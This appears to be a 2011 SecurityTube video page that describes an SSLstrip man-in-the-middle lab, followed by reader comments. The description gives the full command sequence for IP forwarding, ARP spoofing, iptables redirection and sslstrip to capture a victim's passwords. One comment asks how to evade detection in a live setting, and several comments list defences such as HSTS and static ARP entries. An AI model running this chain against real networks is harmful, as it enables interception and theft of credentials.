Sslstrip Tutorial
Posted By: SecurityTube_Bot
Posted On: Mon 21 Feb 2011
Views: 55620
Share this video:
Share it on Facebook Share it on Twitter Share it on Reddit Share it on Digg Share it on Stumbleupon
Support SecurityTube:


Description: SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:

1. Setting up IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

3. Setting up port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

python sslstrip.py -w secret

Once this setup is up and running perfectly, all of our victim's traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim's passwords sent supposedly over "SSL". If you are interested in understanding how the SSLstrip tool actually works, please view the entire presentation video here. You can download the SSLstrip tool here.




Tags: tools ,

Comments (12)

Osaka on Tue 08 Mar 2011

Very good video thank you.

dipzone2000 on Sun 13 Mar 2011

good video. Pls mention countermeaseures

StormCatcher on Wed 16 Mar 2011

Thats really cool dude
Great job
Ok i got a question here.

When you use arpspoof (in a non VM environment) in actual live scenario, what happens is that the arp table of the victim (winXP) also shows the Attacker IP and his MAC Address thereby exposing the attacker to the Victim.

Any ways to circumvent this.

BTW i work on network forensics.

S0ap on Sat 09 Apr 2011

well this is great my freind..good Job..I just got my sec+ and its been a while lyk 5 year into security. But I have ones question which might be very dump!

That Ip u used is a private one, I mean that is the IP user gets after going through NAT, How can we figure that out. I know this might be an easy one, but I just dont know.

Thanks This was awesome...

reinfallt on Thu 14 Apr 2011

I am trying to use this together with a SLAAC Attack instead of a regular ARP spoof attack but I can't get it to work. It's probably naptd messing things up. Any Ideas?

Vishal on Thu 21 Apr 2011

Can u tell me the countermeasure for preventing this???

Mastermind on Sat 11 Jun 2011

XP --> 192.168.1.6 (NAT)

Please help me out-
1) it has only 1 interface which is NAT, then how will backtrack be able to ping XP?
2) What should be the ip configuration with backtrack?

lcx_at on Wed 29 Jun 2011

nice one. played with sslstrip a little bit, seems like my netbanking has a solution for this, good and at the same time curious how they solved it. Will investigate :)

marcusw on Wed 27 Jul 2011

The solution to this issue is very simple: make sure your login pages are using https. Keeping faith with the X.509 infrastructure which https uses (which may not be such a good idea), as long as https is being used, you're safe.

Thanks for the great video; I'm going to have lots of fun with ARP spoofing.

Peca on Sun 11 Sep 2011

Some of countermeasure can be static arp table with default gateway pointing to the real hardcoded MAC address:
arp -s 192.168.1.1 00-aa-11-bb-22-cc

Great video. TNX

TrojanCentaur on Thu 27 Oct 2011

Another countermeasure is either HSTS (Chrome or Firefox) or CSP (Firefox). It won't protect first time users, but the vast majority of your traffic (and your most sensitive information) will be posted by returning visitors.

Additionally, some cookies can be set to ONLY send via SSL, so existing sessions won't be preserved over sslstrip. Users *might* suspect something's up when they get mysteriously logged out.

TC

yash_advani on Sat 05 Nov 2011

Hi,
This for those of you who were wondering if there was any counter measure available.
Well yes, you can use tools like 'arpwatch' or 'arpon' that allow you to prevent arp spoofing.
Arpwatch keeps a watch on your arp table and any changes found in the same are recorded. You can provide settings using which you will be alerted whenever your arp table gets modified.
Arpon is one step further. It not only detects the change, it prevents it as well, thus automatically securing your machine from arp spoofing.

Great video, good job :)

Login to post a comment